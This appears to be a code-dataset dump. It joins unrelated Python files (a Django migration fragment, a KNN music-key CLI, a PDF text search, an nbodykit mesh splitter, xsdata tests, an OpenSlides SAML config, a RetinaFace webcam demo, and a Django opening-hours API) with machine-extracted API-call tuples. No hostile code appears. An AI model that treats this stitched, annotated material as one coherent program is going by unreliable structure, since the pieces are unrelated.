"(max_length=32, verbose_name='Name')\n", (898, 934), False, 'from django.db import migrations, models\n'), ((963, 1041), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'null': '(True)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=254, null=True, verbose_name='Email')\n", (980, 1041), False, 'from django.db import migrations, models\n'), ((1079, 1169), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(32)', 'null': '(True)', 'verbose_name': '"""Contact number"""'}), "(blank=True, max_length=32, null=True, verbose_name=\n 'Contact number')\n", (1095, 1169), False, 'from django.db import migrations, models\n'), ((1195, 1235), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Message"""'}), "(verbose_name='Message')\n", (1211, 1235), False, 'from django.db import migrations, models\n'), ((1512, 1608), 'django.db.models.BigAutoField', 'models.BigAutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1531, 1608), False, 'from django.db import migrations, models\n'), ((1639, 1705), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Created At"""'}), "(auto_now_add=True, verbose_name='Created At')\n", (1659, 1705), False, 'from django.db import migrations, models\n'), ((1742, 1805), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Modified At"""'}), "(auto_now=True, verbose_name='Modified At')\n", (1762, 1805), False, 'from django.db import migrations, models\n'), ((1839, 1916), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Is Instance marked deleted"""'}), "(default=False, verbose_name='Is Instance marked deleted')\n", (1858, 1916), False, 'from 
django.db import migrations, models\n'), ((1949, 2024), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Is Instance marked Active"""'}), "(default=True, verbose_name='Is Instance marked Active')\n", (1968, 2024), False, 'from django.db import migrations, models\n'), ((2052, 2120), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'verbose_name': '"""Type of notification"""'}), "(max_length=32, verbose_name='Type of notification')\n", (2068, 2120), False, 'from django.db import migrations, models\n'), ((2149, 2241), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'contact.models.social_links.upload_to', 'verbose_name': '"""Image"""'}), "(upload_to=contact.models.social_links.upload_to,\n verbose_name='Image')\n", (2166, 2241), False, 'from django.db import migrations, models\n')] |
from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn
import argparse
import textwrap
def compute(k=1):
"""
Base model of key detection for
Musicnet metadata based in TF-IDF and KNN
"""
knn.compute(k=k)
def run():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent(compute.__doc__))
parser.add_argument(
'--k', help='Number of Neighbours KNN',
type=int, default=1, required=False)
parser.add_argument(
'--ngram_size', help='Size of ngrams',
type=int, default=5, required=False)
args, extra_params = parser.parse_known_args()
knn.compute(k=args.k, ngram_size=args.ngram_size)
| [
"textwrap.dedent",
"pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute"
] | [((232, 248), 'pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute', 'knn.compute', ([], {'k': 'k'}), '(k=k)\n', (243, 248), False, 'from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn\n'), ((707, 756), 'pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute', 'knn.compute', ([], {'k': 'args.k', 'ngram_size': 'args.ngram_size'}), '(k=args.k, ngram_size=args.ngram_size)\n', (718, 756), False, 'from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn\n'), ((379, 411), 'textwrap.dedent', 'textwrap.dedent', (['compute.__doc__'], {}), '(compute.__doc__)\n', (394, 411), False, 'import textwrap\n')] |
#!/usr/bin/python
import sys
import re
import slate
import pickle
import nltk
import glob
import os
def main():
if len(sys.argv) < 2:
sys.exit('Usage: %s search-term' % sys.argv[0])
targets = glob.glob('./*.pdf')
for target in targets:
print("searching in: " + target)
with open(target) as f:
doc = slate.PDF(f)
for i in range (0,len(doc)):
if sys.argv[1].lower() in doc[i].lower():
print("FOUND! in page " + str(i+1))
if __name__ == "__main__":
main() | [
"slate.PDF",
"glob.glob",
"sys.exit"
] | [((214, 234), 'glob.glob', 'glob.glob', (['"""./*.pdf"""'], {}), "('./*.pdf')\n", (223, 234), False, 'import glob\n'), ((155, 202), 'sys.exit', 'sys.exit', (["('Usage: %s search-term' % sys.argv[0])"], {}), "('Usage: %s search-term' % sys.argv[0])\n", (163, 202), False, 'import sys\n'), ((338, 350), 'slate.PDF', 'slate.PDF', (['f'], {}), '(f)\n', (347, 350), False, 'import slate\n')] |
import sys, platform, os
sys.path.insert(0,'/global/u1/s/spandey/kmeans_radec/')
import numpy as np
import scipy as sp
import scipy.integrate as integrate
import scipy.signal as spsg
import matplotlib.pyplot as plt
import pdb
import healpy as hp
from astropy.io import fits
from kmeans_radec import KMeans, kmeans_sample
import time
import math
from scipy import interpolate
import treecorr
import pickle as pk
import configparser
import ast
from astropy.io import fits
from astropy.coordinates import SkyCoord
from astropy import units as u
import astropy.constants as const
import kmeans_radec
import h5py as h5
import argparse
import gc
sys.path.insert(0,'/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/')
import process_cats_class as pcc
cosmo_params_dict = {'flat': True, 'H0': 70.0, 'Om0': 0.25, 'Ob0': 0.044, 'sigma8': 0.8, 'ns': 0.95}
from nbodykit.lab import HDFCatalog
def load_mesh_h5(cat_str, N, box_size):
f = HDFCatalog(cat_str)
f.attrs['BoxSize'] = box_size
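    # build an N^3 density mesh from the catalogue, with the painting-window compensation enabled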
return f.to_mesh(Nmesh=N, compensated=True)
def ang2eq(theta, phi):
ra = phi * 180. / np.pi
dec = 90. - theta * 180. / np.pi
return ra, dec
def eq2ang(ra, dec):
phi = ra * np.pi / 180.
theta = (np.pi / 2.) - dec * (np.pi / 180.)
return theta, phi
def get_zmean(zcent,delz,nz_bin):
prob_zcent = nz_bin
zmean = (np.sum(prob_zcent*zcent*delz))/(np.sum(prob_zcent*delz))
return zmean
box_size = 4225.35211
box_size_h = box_size*0.71
N = 3000
# dm_str = '/global/cscratch1/sd/samgolds/gal_cat_24_5.h5'
dm_str = '/global/cscratch1/sd/samgolds/dm_cat.h5'
mesh_dm = load_mesh_h5(dm_str, N, box_size)
mesh_dm_real = mesh_dm.to_real_field()
nsp = 10
nbox = int(N/nsp)
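# split the full mesh into nsp^3 equal sub-cubes and pickle each block to a separate file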
for j1 in range(nsp):
for j2 in range(nsp):
for j3 in range(nsp):
pk.dump(mesh_dm_real[j1*nbox:(j1+1)*nbox,j2*nbox:(j2+1)*nbox,j3*nbox:(j3+1)*nbox],open('/global/project/projectdirs/m1727/shivamp_lsst/data_set/dm_mesh/mesh_dm_real_Ng3000_fullbox_nsp' + str(nsp) + '_' + str(j1) + '_' + str(j2) + '_' + str(j3) + '.pk', 'wb'))
| [
"nbodykit.lab.HDFCatalog",
"numpy.sum",
"sys.path.insert"
] | [((25, 81), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/global/u1/s/spandey/kmeans_radec/"""'], {}), "(0, '/global/u1/s/spandey/kmeans_radec/')\n", (40, 81), False, 'import sys, platform, os\n'), ((640, 756), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/"""'], {}), "(0,\n '/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/'\n )\n", (655, 756), False, 'import sys, platform, os\n'), ((966, 985), 'nbodykit.lab.HDFCatalog', 'HDFCatalog', (['cat_str'], {}), '(cat_str)\n', (976, 985), False, 'from nbodykit.lab import HDFCatalog\n'), ((1372, 1405), 'numpy.sum', 'np.sum', (['(prob_zcent * zcent * delz)'], {}), '(prob_zcent * zcent * delz)\n', (1378, 1405), True, 'import numpy as np\n'), ((1404, 1429), 'numpy.sum', 'np.sum', (['(prob_zcent * delz)'], {}), '(prob_zcent * delz)\n', (1410, 1429), True, 'import numpy as np\n')] |
import os
from pathlib import Path
from click.testing import CliRunner
from tests.conftest import load_class
from tests.conftest import validate_bindings
from xsdata import cli
os.chdir(Path(__file__).parent.parent.parent)
def test_integration():
schema = Path("tests/fixtures/defxmlschema/chapter12/chapter12.xsd")
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [str(schema), "--package", package])
if result.exception:
raise result.exception
clazz = load_class(result.output, "Items")
validate_bindings(schema, clazz)
def test_example1202():
schema = "tests/fixtures/defxmlschema/chapter12/example1202.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1203():
schema = "tests/fixtures/defxmlschema/chapter12/example1203.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1205():
schema = "tests/fixtures/defxmlschema/chapter12/example1205.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1207():
schema = "tests/fixtures/defxmlschema/chapter12/example1207.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1209():
schema = "tests/fixtures/defxmlschema/chapter12/example1209.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1211():
schema = "tests/fixtures/defxmlschema/chapter12/example1211.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1212():
schema = "tests/fixtures/defxmlschema/chapter12/example1212.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1213():
schema = "tests/fixtures/defxmlschema/chapter12/example1213.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1215():
schema = "tests/fixtures/defxmlschema/chapter12/example1215.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1218():
schema = "tests/fixtures/defxmlschema/chapter12/example1218.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1219():
schema = "tests/fixtures/defxmlschema/chapter12/example1219.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1221():
schema = "tests/fixtures/defxmlschema/chapter12/example1221.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1223():
schema = "tests/fixtures/defxmlschema/chapter12/example1223.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1224():
schema = "tests/fixtures/defxmlschema/chapter12/example1224.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1227():
schema = "tests/fixtures/defxmlschema/chapter12/example1227.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1229():
schema = "tests/fixtures/defxmlschema/chapter12/example1229.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1230():
schema = "tests/fixtures/defxmlschema/chapter12/example1230.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1231():
schema = "tests/fixtures/defxmlschema/chapter12/example1231.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1232():
schema = "tests/fixtures/defxmlschema/chapter12/example1232.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1233():
schema = "tests/fixtures/defxmlschema/chapter12/example1233.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1235():
schema = "tests/fixtures/defxmlschema/chapter12/example1235.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1237():
schema = "tests/fixtures/defxmlschema/chapter12/example1237.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1240():
schema = "tests/fixtures/defxmlschema/chapter12/example1240.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1242():
schema = "tests/fixtures/defxmlschema/chapter12/example1242.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1244():
schema = "tests/fixtures/defxmlschema/chapter12/example1244.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1246():
schema = "tests/fixtures/defxmlschema/chapter12/example1246.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1247():
schema = "tests/fixtures/defxmlschema/chapter12/example1247.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
| [
"tests.conftest.validate_bindings",
"tests.conftest.load_class",
"click.testing.CliRunner",
"pathlib.Path"
] | [((266, 325), 'pathlib.Path', 'Path', (['"""tests/fixtures/defxmlschema/chapter12/chapter12.xsd"""'], {}), "('tests/fixtures/defxmlschema/chapter12/chapter12.xsd')\n", (270, 325), False, 'from pathlib import Path\n'), ((393, 404), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (402, 404), False, 'from click.testing import CliRunner\n'), ((544, 578), 'tests.conftest.load_class', 'load_class', (['result.output', '"""Items"""'], {}), "(result.output, 'Items')\n", (554, 578), False, 'from tests.conftest import load_class\n'), ((583, 615), 'tests.conftest.validate_bindings', 'validate_bindings', (['schema', 'clazz'], {}), '(schema, clazz)\n', (600, 615), False, 'from tests.conftest import validate_bindings\n'), ((778, 789), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (787, 789), False, 'from click.testing import CliRunner\n'), ((1073, 1084), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1082, 1084), False, 'from click.testing import CliRunner\n'), ((1368, 1379), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1377, 1379), False, 'from click.testing import CliRunner\n'), ((1663, 1674), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1672, 1674), False, 'from click.testing import CliRunner\n'), ((1958, 1969), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1967, 1969), False, 'from click.testing import CliRunner\n'), ((2253, 2264), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2262, 2264), False, 'from click.testing import CliRunner\n'), ((2548, 2559), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2557, 2559), False, 'from click.testing import CliRunner\n'), ((2843, 2854), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2852, 2854), False, 'from click.testing import CliRunner\n'), ((3138, 3149), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3147, 3149), False, 'from click.testing import CliRunner\n'), ((3433, 3444), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3442, 3444), False, 'from click.testing import CliRunner\n'), ((3728, 3739), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3737, 3739), False, 'from click.testing import CliRunner\n'), ((4023, 4034), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4032, 4034), False, 'from click.testing import CliRunner\n'), ((4318, 4329), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4327, 4329), False, 'from click.testing import CliRunner\n'), ((4613, 4624), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4622, 4624), False, 'from click.testing import CliRunner\n'), ((4908, 4919), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4917, 4919), False, 'from click.testing import CliRunner\n'), ((5203, 5214), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5212, 5214), False, 'from click.testing import CliRunner\n'), ((5498, 5509), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5507, 5509), False, 'from click.testing import CliRunner\n'), ((5793, 5804), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5802, 5804), False, 'from click.testing import CliRunner\n'), ((6088, 6099), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6097, 6099), False, 'from click.testing import CliRunner\n'), ((6383, 6394), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6392, 6394), False, 'from click.testing import CliRunner\n'), ((6678, 6689), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6687, 6689), False, 'from 
click.testing import CliRunner\n'), ((6973, 6984), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6982, 6984), False, 'from click.testing import CliRunner\n'), ((7268, 7279), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7277, 7279), False, 'from click.testing import CliRunner\n'), ((7563, 7574), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7572, 7574), False, 'from click.testing import CliRunner\n'), ((7858, 7869), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7867, 7869), False, 'from click.testing import CliRunner\n'), ((8153, 8164), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8162, 8164), False, 'from click.testing import CliRunner\n'), ((8448, 8459), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8457, 8459), False, 'from click.testing import CliRunner\n'), ((189, 203), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (193, 203), False, 'from pathlib import Path\n')] |
import os
import sys
from django.apps import AppConfig
from . import (
__description__,
__license__,
__url__,
__verbose_name__,
__version__,
)
from .exceptions import SamlException
class SamlAppConfig(AppConfig):
name = 'openslides_saml'
verbose_name = __verbose_name__
description = __description__
version = __version__
license = __license__
url = __url__
angular_site_module = True
js_files = [
'static/js/openslides_saml/base.js',
'static/js/openslides_saml/site.js',
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
try:
import onelogin.saml2 # noqa
except ImportError:
raise SamlException('Could not import onelogin.saml2. Is python-saml3 installed?')
def ready(self):
# Import all required stuff.
from django.conf import settings
from .urls import urlpatterns
from .settings import SamlSettings
try:
settings_dir = os.path.dirname(os.path.abspath(settings.SETTINGS_FILEPATH))
except AttributeError:
raise SamlException(
"'SETTINGS_FILEPATH' is not in your settings.py. " +
"Would you kindly add the following line: 'SETTINGS_FILEPATH = __file__'?")
        # Instantiate the SamlSettings if the worker is run normally. Here the
        # class is loaded for the first time and, by providing settings_dir,
        # its internal state is bound to that path.
if sys.argv[1] != 'create-saml-settings':
SamlSettings(settings_dir)
# Make the urls available for openslides
self.urlpatterns = urlpatterns
def get_angular_constants(self):
from .settings import SamlSettings
saml_settings = {
'name': 'SAMLSettings',
'value': SamlSettings.get_general_settings()}
return [saml_settings]
| [
"os.path.abspath"
] | [((1051, 1094), 'os.path.abspath', 'os.path.abspath', (['settings.SETTINGS_FILEPATH'], {}), '(settings.SETTINGS_FILEPATH)\n', (1066, 1094), False, 'import os\n')] |
import tensorflow as tf
k = tf.keras
import numpy as np
import cv2
from scipy.special import softmax, expit
import sys
import os
sys.path.insert(0, os.getcwd())
from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm
def detect_face(retinaface_model: k.Model,
pfld_model: k.Model,
anchors: np.ndarray,
draw_img: np.ndarray,
obj_thresh=0.7,
nms_threshold=0.4,
variances=[0.1, 0.2]):
""" resize """
img = cv2.cvtColor(draw_img, cv2.COLOR_BGR2RGB)
""" normlize """
det_img = ((img / 255. - 0.5) / 1)[None, ...]
""" infer """
predictions = retinaface_model.predict(det_img)
""" parser """
bbox, landm, clses = np.split(predictions[0], [4, -2], 1)
""" softmax class"""
clses = softmax(clses, -1)
score = clses[:, 1]
""" decode """
bbox = decode_bbox(bbox, anchors, variances)
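  # scale the decoded boxes from normalised coordinates to the 640x640 detector input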
bbox = bbox * np.tile([640, 640], [2])
""" filter low score """
inds = np.where(score > obj_thresh)[0]
bbox = bbox[inds]
score = score[inds]
""" keep top-k before NMS """
order = np.argsort(score)[::-1]
bbox = bbox[order]
score = score[order]
""" do nms """
keep = nms_oneclass(bbox, score, nms_threshold)
for b, s in zip(bbox[keep].astype(int), score[keep]):
cv2.rectangle(draw_img, tuple(b[:2]), tuple(b[2:]), (255, 0, 0), 2)
cx, cy = (b[:2] + b[2:]) // 2
halfw = np.max(b[2:] - b[:2]) // 2
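    # crop a square patch centered on the detected face box for the landmark model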
croped_img: np.ndarray = img[cy - halfw:cy + halfw, cx - halfw:cx + halfw]
croped_wh = croped_img.shape[1::-1]
if croped_wh[0] == croped_wh[1] and min(croped_wh) > 10:
croped_img = cv2.resize(croped_img, (112, 112))
croped_img = ((croped_img / 255. - 0.5) / 1)[None, ...]
landmarks = pfld_model.predict(croped_img)
s_point = np.array([cx - halfw, cy - halfw])
for landm in np.reshape(expit(landmarks), (-1, 2)) * croped_wh:
cv2.circle(draw_img, tuple((s_point + landm).astype(int)), 1, (0, 255, 0))
return draw_img
if __name__ == "__main__":
physical_devices = tf.config.experimental.list_physical_devices('GPU')
assert len(physical_devices) > 0, "Not enough GPU hardware devices available"
tf.config.experimental.set_memory_growth(physical_devices[0], True)
retinaface_model: k.Model = k.models.load_model('asset/retinaface_train.h5')
anchors = get_anchors([640, 640], [[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]],
[8, 16, 32])
pfld_model: k.Model = k.models.load_model('asset/pfld_infer.h5')
capture = cv2.VideoCapture(0)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
while (True):
ret, img = capture.read()
# img = cv2.flip(img, 1)
img = cv2.copyMakeBorder(img, 80, 80, 0, 0, cv2.BORDER_CONSTANT, value=0)
draw_img = detect_face(retinaface_model, pfld_model, anchors, img)
cv2.imshow('frame', draw_img)
if cv2.waitKey(1) == ord('q'):
break
| [
"cv2.imshow",
"numpy.argsort",
"numpy.array",
"numpy.where",
"numpy.max",
"cv2.waitKey",
"numpy.tile",
"scipy.special.softmax",
"scipy.special.expit",
"cv2.cvtColor",
"retinaface_camera.nms_oneclass",
"cv2.resize",
"tensorflow.config.experimental.set_memory_growth",
"cv2.copyMakeBorder",
"os.getcwd",
"retinaface_camera.decode_bbox",
"numpy.split",
"cv2.VideoCapture",
"retinaface_camera.get_anchors",
"tensorflow.config.experimental.list_physical_devices"
] | [((148, 159), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (157, 159), False, 'import os\n'), ((532, 573), 'cv2.cvtColor', 'cv2.cvtColor', (['draw_img', 'cv2.COLOR_BGR2RGB'], {}), '(draw_img, cv2.COLOR_BGR2RGB)\n', (544, 573), False, 'import cv2\n'), ((747, 783), 'numpy.split', 'np.split', (['predictions[0]', '[4, -2]', '(1)'], {}), '(predictions[0], [4, -2], 1)\n', (755, 783), True, 'import numpy as np\n'), ((817, 835), 'scipy.special.softmax', 'softmax', (['clses', '(-1)'], {}), '(clses, -1)\n', (824, 835), False, 'from scipy.special import softmax, expit\n'), ((884, 921), 'retinaface_camera.decode_bbox', 'decode_bbox', (['bbox', 'anchors', 'variances'], {}), '(bbox, anchors, variances)\n', (895, 921), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((1209, 1249), 'retinaface_camera.nms_oneclass', 'nms_oneclass', (['bbox', 'score', 'nms_threshold'], {}), '(bbox, score, nms_threshold)\n', (1221, 1249), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((2070, 2121), 'tensorflow.config.experimental.list_physical_devices', 'tf.config.experimental.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (2114, 2121), True, 'import tensorflow as tf\n'), ((2204, 2271), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (2244, 2271), True, 'import tensorflow as tf\n'), ((2363, 2440), 'retinaface_camera.get_anchors', 'get_anchors', (['[640, 640]', '[[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]]', '[8, 16, 32]'], {}), '([640, 640], [[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]], [8, 16, 32])\n', (2374, 2440), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((2545, 2564), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (2561, 2564), False, 'import cv2\n'), ((938, 962), 'numpy.tile', 'np.tile', (['[640, 640]', '[2]'], {}), '([640, 640], [2])\n', (945, 962), True, 'import numpy as np\n'), ((999, 1027), 'numpy.where', 'np.where', (['(score > obj_thresh)'], {}), '(score > obj_thresh)\n', (1007, 1027), True, 'import numpy as np\n'), ((1115, 1132), 'numpy.argsort', 'np.argsort', (['score'], {}), '(score)\n', (1125, 1132), True, 'import numpy as np\n'), ((2741, 2808), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['img', '(80)', '(80)', '(0)', '(0)', 'cv2.BORDER_CONSTANT'], {'value': '(0)'}), '(img, 80, 80, 0, 0, cv2.BORDER_CONSTANT, value=0)\n', (2759, 2808), False, 'import cv2\n'), ((2884, 2913), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'draw_img'], {}), "('frame', draw_img)\n", (2894, 2913), False, 'import cv2\n'), ((1425, 1446), 'numpy.max', 'np.max', (['(b[2:] - b[:2])'], {}), '(b[2:] - b[:2])\n', (1431, 1446), True, 'import numpy as np\n'), ((1651, 1685), 'cv2.resize', 'cv2.resize', (['croped_img', '(112, 112)'], {}), '(croped_img, (112, 112))\n', (1661, 1685), False, 'import cv2\n'), ((1813, 1847), 'numpy.array', 'np.array', (['[cx - halfw, cy - halfw]'], {}), '([cx - halfw, cy - halfw])\n', (1821, 1847), True, 'import numpy as np\n'), ((2921, 2935), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2932, 2935), False, 'import cv2\n'), ((1878, 1894), 'scipy.special.expit', 'expit', (['landmarks'], {}), '(landmarks)\n', (1883, 1894), False, 'from scipy.special import softmax, expit\n')] |
from django.utils.datetime_safe import datetime
from rest_framework import serializers, viewsets
from rest_framework.response import Response
from opening_hours.hours import get_opening_hours
from reservation_units.models import ReservationUnit
class OpeningHours(object):
def __init__(self, id: int, start_date: datetime, end_date: datetime):
self.id = id
self.opening_hours = self.get_hours(start_date, end_date)
def get_hours(self, start_date: datetime, end_date: datetime):
return get_opening_hours(
resource_id=f"{self.id}",
start_date=start_date,
end_date=end_date,
)
class OpenTimeSerializer(serializers.Serializer):
start_time = serializers.TimeField(read_only=True)
end_time = serializers.TimeField(read_only=True)
end_time_on_next_day = serializers.BooleanField(read_only=True)
class OpeningHourDateSerialiser(serializers.Serializer):
date = serializers.DateField(read_only=True)
times = OpenTimeSerializer(read_only=True, many=True)
class OpeningHoursSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True)
opening_hours = OpeningHourDateSerialiser(read_only=True, many=True)
class OpeningHoursViewSet(viewsets.ViewSet):
serializer_class = OpeningHoursSerializer
def retrieve(self, request, pk=None):
start_date = self.request.query_params.get("start_date")
end_date = self.request.query_params.get("end_date")
unit = ReservationUnit.objects.get(pk=pk)
return Response(
OpeningHoursSerializer(
instance=OpeningHours(
id=unit.id, start_date=start_date, end_date=end_date
)
).data
)
| [
"rest_framework.serializers.IntegerField",
"rest_framework.serializers.BooleanField",
"rest_framework.serializers.DateField",
"rest_framework.serializers.TimeField",
"opening_hours.hours.get_opening_hours",
"reservation_units.models.ReservationUnit.objects.get"
